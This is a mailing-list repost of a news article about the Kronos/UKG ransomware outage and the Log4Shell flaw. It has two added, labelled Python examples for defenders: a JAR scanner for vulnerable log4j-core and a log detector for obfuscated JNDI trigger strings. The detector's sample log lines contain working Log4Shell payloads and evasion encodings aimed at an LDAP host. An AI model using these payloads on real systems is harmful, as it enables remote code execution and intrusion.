[BreachExchange] Ransomware strikes workflow solutions provider Kronos via suspected Log4shell exploit

Terrell Byrd terrell.byrd at riskbasedsecurity.com
Tue Dec 14 09:49:08 EST 2021


https://siliconangle.com/2021/12/13/ransomware-strikes-workflow-solutions-provider-kronos-via-suspected-log4shell-exploit/

A ransomware attack has struck workflow management solutions provider
Kronos Inc. and knocked services offline.

UKG Inc., the parent company of Kronos, said today that the ransomware
attack could result in its services being out for “several weeks.” The
company even suggested that its customers should seek other ways to
facilitate payroll payments and human resources-related activities.

Notable Kronos customers include Tesla Inc., Marriott International Inc.,
Yamaha Corp., Aramark Corp., Samsung Electronics Co. Ltd. and Sony Music
Entertainment.

The ransomware attack specifically targeted the Kronos Private Cloud. The
attack also knocked offline UKG Workforce Central, UKG TeleStaff,
Healthcare Extensions and Banking Scheduling Solutions.

“At this time, we still do not have an estimated restoration time, and it
is likely that the issue may require at least several days to resolve,” UKG
said in a community post. “We continue to recommend that our impacted
customers evaluate alternative plans to process time and attendance data
for payroll processing, to manage schedules and to manage other related
operations important to their organization.”

Kronos did not reveal the form of ransomware involved in the attack.
Although the company did not provide details, reports suggest that the
ransomware attack exploited the Log4Shell vulnerability. Log4Shell
(CVE-2021-44228) is the name given to the Log4j vulnerability that has been
making headlines over the last few days.

Ars Technica noted today that Kronos’ cloud services rely heavily on Java,
the language and runtime that Log4j is written for. The Log4Shell
vulnerability allows attackers to run code of their choosing on the affected
server, with the privileges of the vulnerable Java application, and is
described as trivially easy to exploit.

The Log4j vulnerability is a flaw in a popular open-source logging library
used by applications written in the Java programming language: when a
specially crafted string reaches a log statement, the library treats it as
a lookup and fetches code from a server the attacker names.

“With the Log4j vulnerability impacting many internet-facing systems,
Kronos/UKG may be old news soon,” James Shank, senior security evangelist
and chief architect of community services at threat intelligence company
Team Cymru Inc., told SiliconANGLE. “There are already reports of a variety
of actors using the Log4j exploit. Microsoft has already seen a common
precursor to ransomware, Cobalt Strike, landing on Log4j exploited systems.
It won’t be long before we hear of ransomware events tied to Log4j as the
initial vector.”

Michael Assraf, chief executive officer of vulnerability remediation
company Vicarius Ltd., noted that the way modern products are built is by
using a big hierarchy of dependencies. That means developers use libraries
written by third-party companies and engineers to speed up the software
release process.

Assraf said Log4j is an extremely basic library that allows log writing in
Java applications. The way the Log4j vulnerability works is that it comes in
three layers: cloud products that directly use the Log4j, web applications
that use libraries employing Log4j and off-the-shelf software that’s
internally deployed on customer servers and endpoints. The first is where
Kronos has been hit by ransomware.
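Telling which of those layers an organization sits in starts with locating every copy of log4j-core, including copies buried inside other archives. The scanner below is an added example, not code from Kronos, UKG, Vicarius or the article: it walks a JAR, recurses into nested JARs (fat JARs, Spring Boot BOOT-INF/lib, WEB-INF/lib), reads the version from log4j-core's Maven pom.properties and checks whether JndiLookup.class is still present. The sample JARs it builds are constructed in memory with placeholder class bytes; the entry paths it checks are real log4j-core paths, and the 2.15.0 threshold is an assumption matching the release that closed CVE-2021-44228.

```python
import io
import re
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED = (2, 15, 0)   # assumption: first log4j-core release addressing CVE-2021-44228


def parse_version(text: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); missing components are treated as 0."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def scan_jar(data: bytes, location: str, findings=None, depth: int = 0) -> list:
    """Record every log4j-core inside `data`, recursing into nested JARs."""
    if findings is None:
        findings = []
    if depth > 8:                         # guard against pathological nesting
        return findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            findings.append({
                "location": location,
                "version": version,
                "jndi_lookup_present": has_jndi,
                # No JndiLookup class means the "delete the class" mitigation was
                # applied; an unknown version with the class present is treated as unpatched.
                "vulnerable": has_jndi and (version is None or parse_version(version) < FIXED),
            })
        for name in sorted(names):
            if name.endswith(".jar"):
                scan_jar(zf.read(name), f"{location}!/{name}", findings, depth + 1)
    return findings


def scan_file(path: str) -> list:
    with open(path, "rb") as f:
        return scan_jar(f.read(), path)


def _jar(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def sample_jars() -> dict:
    """Constructed test inputs (class files are placeholder bytes, not real classes)."""
    def core(version, with_jndi=True):
        entries = {POM_PROPS: f"version={version}\nartifactId=log4j-core\n"}
        if with_jndi:
            entries[JNDI_CLASS] = b"\xca\xfe\xba\xbe"
        return _jar(entries)
    return {
        # Spring-Boot-style fat JAR bundling an unpatched 2.14.1 two levels down
        "app.jar": _jar({
            "BOOT-INF/classes/com/example/App.class": b"\xca\xfe\xba\xbe",
            "BOOT-INF/lib/log4j-api-2.14.1.jar": _jar({"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n"}),
            "BOOT-INF/lib/log4j-core-2.14.1.jar": core("2.14.1"),
        }),
        # same version with JndiLookup.class removed from the archive
        "mitigated.jar": core("2.14.1", with_jndi=False),
        # upgraded build
        "upgraded.jar": core("2.17.1"),
    }


if __name__ == "__main__":
    for name, data in sample_jars().items():
        for finding in scan_jar(data, name):
            print(finding)
```

Run scan_file over every .jar, .war and .ear on a host to get the per-archive list. Apache shipped further log4j-core releases for follow-on issues after 2.15.0, so set FIXED to the threshold of the advisory you are tracking rather than leaving it at the CVE-2021-44228 value.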

Kronos could be one of many companies to come. Paul Ducklin, principal
research scientist at security software company Sophos Group plc, said
there’s a “staggering number of different ways that the Log4Shell ‘trigger
text’ can be encoded, the huge number of different places in your network
traffic that these strings can appear, and the wide variety of servers and
services that could be affected are collectively conspiring against all of
us.”
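The encoding problem Ducklin describes is why a plain search for the string `${jndi:` misses most real traffic: Log4j evaluates nested lookups before it ever sees the JNDI prefix, so a detector has to do the same. The following Python is an added example, not code from the article or from any vendor quoted in it. It URL-decodes each log line, collapses nested lookups from the inside out (the `lower`/`upper` lookups and the `:-` default-value syntax that the common evasions rely on, an assumed subset of Log4j's lookup grammar), and only then searches for the JNDI trigger. The access-log lines are constructed for illustration and 198.51.100.7 is a documentation address.

```python
import re
from urllib.parse import unquote

# Innermost Log4j-style lookup: ${...} with no further ${ or } inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)
# Placeholder for a lookup kept verbatim, so INNER does not match it again.
KEEP = "\x00KEEP\x00"


def _resolve_one(body: str) -> str:
    """Evaluate one innermost lookup body the way Log4j's substitutor would,
    as far as that is possible offline. Unknown lookups are kept as written."""
    prefix = body.split(":", 1)[0].lower()
    if prefix == "jndi":
        return KEEP + body + "}"          # the trigger itself: preserve it
    if ":-" in body:
        # ${env:NOPE:-j} or ${::-j}: the lookup fails, the default text wins
        return body.split(":-", 1)[1]
    key = body.partition(":")[2]
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    return KEEP + body + "}"              # ${date:...}, ${sys:...}: not evaluated here


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):           # bounded so hostile input cannot loop forever
        new = INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text.replace(KEEP, "${")


def _balanced(text: str, start: int) -> str:
    """Return the lookup starting at `start` up to its matching closing brace."""
    depth = 0
    for i in range(start, len(text)):
        if text.startswith("${", i):
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
    return text[start:]


def find_log4shell(line: str):
    """Return the de-obfuscated ${jndi:...} payload in `line`, or None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    return _balanced(norm, m.start()) if m else None


def scan(lines):
    """(line number, payload) for each line carrying a Log4Shell trigger."""
    return [(n, p) for n, line in enumerate(lines, 1) if (p := find_log4shell(line))]


# Constructed access-log lines: one clean request, four evasions, one benign lookup.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:08:01:02] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:08:01:03] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:08:01:04] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D HTTP/1.1" 404',
    '10.0.0.9 - - [13/Dec/2021:08:01:05] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/c}"',
    '10.0.0.9 - - [13/Dec/2021:08:01:06] "GET / HTTP/1.1" 200 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.7:1389/d}"',
    '10.0.0.3 - - [13/Dec/2021:08:01:07] "GET /docs/${date:yyyy} HTTP/1.1" 200',
]

if __name__ == "__main__":
    for number, payload in scan(SAMPLE_LOG):
        print(f"line {number}: {payload}")
```

The same normalization applies to any field an application might log (User-Agent, X-Forwarded-For, form values, usernames), which is Ducklin's second point: the detector is only as good as the set of inputs you feed it, and the four evasions above are a sample of the encodings in circulation, not a complete list.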

Even organizations with the best of intentions, including serious deployment
of cybersecurity measures, are exposed, because Log4Shell bypasses many
traditional protection solutions: the trigger string travels inside ordinary
application traffic, so perimeter controls see nothing unusual.

“Although Kronos Private Cloud was secured by firewalls, encrypted
transmissions and multifactor authentication, cybercriminals were still
able to breach and encrypt its servers,” explained Nick Tausek, security
solutions architect at security automation company Swimlane Inc. “This
extended shutdown will likely present challenges for many organizations as
they seek to roll out bonuses and employees look to request time off ahead
of the holidays.”